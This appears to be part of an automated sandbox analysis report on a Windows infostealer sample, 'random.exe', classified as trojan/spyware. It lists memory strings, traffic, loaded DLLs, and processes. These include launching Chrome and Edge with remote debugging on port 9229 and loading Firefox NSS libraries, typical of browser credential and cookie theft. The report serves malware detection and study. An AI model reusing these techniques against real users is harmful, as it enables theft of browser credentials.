Source: random.exe, 00000000.00000002.2551905997.00000000015D2000.00000004.00000020.00020000.00000000.sdmp, DGDBFBFCBFBKECAAKJKF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: random.exe, 00000000.00000002.2551905997.00000000015D2000.00000004.00000020.00020000.00000000.sdmp, DGDBFBFCBFBKECAAKJKF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: random.exe, 00000000.00000003.2325881794.000000000BE28000.00000004.00000020.00020000.00000000.sdmp, FIJDGIJJ.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random.exe, 00000000.00000003.2325881794.000000000BE28000.00000004.00000020.00020000.00000000.sdmp, FIJDGIJJ.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: random.exe, 00000000.00000003.2325881794.000000000BE28000.00000004.00000020.00020000.00000000.sdmp, FIJDGIJJ.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DGDBFBFCBFBKECAAKJKF.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: GIJJKFCGDGHDHIECGCBKEBFIEG.0.dr String found in binary or memory: https://support.mozilla.org
Source: GIJJKFCGDGHDHIECGCBKEBFIEG.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: GIJJKFCGDGHDHIECGCBKEBFIEG.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: random.exe, 00000000.00000002.2551905997.00000000015D2000.00000004.00000020.00020000.00000000.sdmp, DGDBFBFCBFBKECAAKJKF.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: random.exe, 00000000.00000003.2325881794.000000000BE28000.00000004.00000020.00020000.00000000.sdmp, FIJDGIJJ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: random.exe, 00000000.00000003.2325881794.000000000BE28000.00000004.00000020.00020000.00000000.sdmp, FIJDGIJJ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: GIJJKFCGDGHDHIECGCBKEBFIEG.0.dr String found in binary or memory: https://www.mozilla.org
Source: GIJJKFCGDGHDHIECGCBKEBFIEG.0.dr String found in binary or memory: https://www.mozilla.org#
Source: GIJJKFCGDGHDHIECGCBKEBFIEG.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: GIJJKFCGDGHDHIECGCBKEBFIEG.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: GIJJKFCGDGHDHIECGCBKEBFIEG.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: random.exe, 00000000.00000002.2551905997.00000000015D2000.00000004.00000020.00020000.00000000.sdmp, DGDBFBFCBFBKECAAKJKF.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51120
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51102
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 51121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:51102 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:51120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:51121 version: TLS 1.2

System Summary

barindex
Source: random.exe Static PE information: section name:
Source: random.exe Static PE information: section name: .idata
Source: random.exe Static PE information: section name:
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C9DB700
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9DB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C9DB8C0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C9DB910
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C97F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C97F280
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9735A0 0_2_6C9735A0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C986C80 0_2_6C986C80
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9D34A0 0_2_6C9D34A0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9DC4A0 0_2_6C9DC4A0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C99D4D0 0_2_6C99D4D0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9864C0 0_2_6C9864C0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B6CF0 0_2_6C9B6CF0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C97D4E0 0_2_6C97D4E0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B5C10 0_2_6C9B5C10
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9C2C10 0_2_6C9C2C10
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9EAC00 0_2_6C9EAC00
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9E542B 0_2_6C9E542B
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9E545C 0_2_6C9E545C
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C985440 0_2_6C985440
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B0DD0 0_2_6C9B0DD0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9D85F0 0_2_6C9D85F0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9A0512 0_2_6C9A0512
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C99ED10 0_2_6C99ED10
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C98FD00 0_2_6C98FD00
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C995E90 0_2_6C995E90
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9DE680 0_2_6C9DE680
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9D4EA0 0_2_6C9D4EA0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C97BEF0 0_2_6C97BEF0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C98FEF0 0_2_6C98FEF0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9E76E3 0_2_6C9E76E3
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B7E10 0_2_6C9B7E10
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9C5600 0_2_6C9C5600
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9D9E30 0_2_6C9D9E30
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C999E50 0_2_6C999E50
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B3E50 0_2_6C9B3E50
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9C2E4E 0_2_6C9C2E4E
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C994640 0_2_6C994640
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C97C670 0_2_6C97C670
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9E6E63 0_2_6C9E6E63
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9C77A0 0_2_6C9C77A0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9A6FF0 0_2_6C9A6FF0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C97DFE0 0_2_6C97DFE0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B7710 0_2_6C9B7710
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C989F00 0_2_6C989F00
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9A60A0 0_2_6C9A60A0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9E50C7 0_2_6C9E50C7
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C99C0E0 0_2_6C99C0E0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B58E0 0_2_6C9B58E0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C987810 0_2_6C987810
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9BB820 0_2_6C9BB820
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9C4820 0_2_6C9C4820
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C998850 0_2_6C998850
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C99D850 0_2_6C99D850
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9BF070 0_2_6C9BF070
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B5190 0_2_6C9B5190
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9D2990 0_2_6C9D2990
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9AD9B0 0_2_6C9AD9B0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C97C9A0 0_2_6C97C9A0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C99A940 0_2_6C99A940
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9CB970 0_2_6C9CB970
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9EB170 0_2_6C9EB170
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C98D960 0_2_6C98D960
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9EBA90 0_2_6C9EBA90
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C98CAB0 0_2_6C98CAB0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9E2AB0 0_2_6C9E2AB0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9722A0 0_2_6C9722A0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9A4AA0 0_2_6C9A4AA0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B8AC0 0_2_6C9B8AC0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C991AF0 0_2_6C991AF0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9BE2F0 0_2_6C9BE2F0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9B9A60 0_2_6C9B9A60
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C97F380 0_2_6C97F380
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9E53C8 0_2_6C9E53C8
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9BD320 0_2_6C9BD320
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C975340 0_2_6C975340
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C98C370 0_2_6C98C370
Source: C:\Users\user\Desktop\random.exe Code function: String function: 6C9B94D0 appears 90 times
Source: C:\Users\user\Desktop\random.exe Code function: String function: 6C9ACBE8 appears 134 times
Source: random.exe, 00000000.00000002.2562580072.000000006CA02000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs random.exe
Source: random.exe, 00000000.00000002.2562953985.000000006CBF5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs random.exe
Source: random.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random.exe Static PE information: Section: bnnygdcb ZLIB complexity 0.9945902952022506
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@30/44@3/5
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C9D7030
Source: C:\Users\user\Desktop\random.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\BI57CVIZ.htm Jump to behavior
Source: C:\Users\user\Desktop\random.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, random.exe, 00000000.00000002.2562193872.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.2555094848.0000000005EA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, random.exe, 00000000.00000002.2562193872.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.2555094848.0000000005EA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, random.exe, 00000000.00000002.2562193872.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.2555094848.0000000005EA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, random.exe, 00000000.00000002.2562193872.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.2555094848.0000000005EA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, random.exe, 00000000.00000002.2562193872.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.2555094848.0000000005EA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, random.exe, 00000000.00000002.2562193872.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.2555094848.0000000005EA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: random.exe, 00000000.00000002.2562193872.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.2555094848.0000000005EA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: random.exe, 00000000.00000003.2454266195.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2325228663.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2325997513.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, KKECFIEBGCAKJKECGCFI.0.dr, AFBKKFBAEGDHJJJJKFBK.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: random.exe, 00000000.00000002.2562193872.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.2555094848.0000000005EA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: random.exe, 00000000.00000002.2562193872.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.2555094848.0000000005EA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: random.exe Virustotal: Detection: 56%
Source: random.exe ReversingLabs: Detection: 55%
Source: random.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 --field-trial-handle=2000,i,4050168269701777740,16737877777387184251,262144 /prefetch:8
Source: C:\Users\user\Desktop\random.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2232,i,7956878243946744101,2440705188154104413,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2004,i,12831764087461894123,4261452385602701126,262144 /prefetch:3
Source: C:\Users\user\Desktop\random.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\Desktop\random.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 --field-trial-handle=2000,i,4050168269701777740,16737877777387184251,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2232,i,7956878243946744101,2440705188154104413,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2004,i,12831764087461894123,4261452385602701126,262144 /prefetch:3 Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\random.exe Section loaded: vcruntime140.dll Jump to behavior
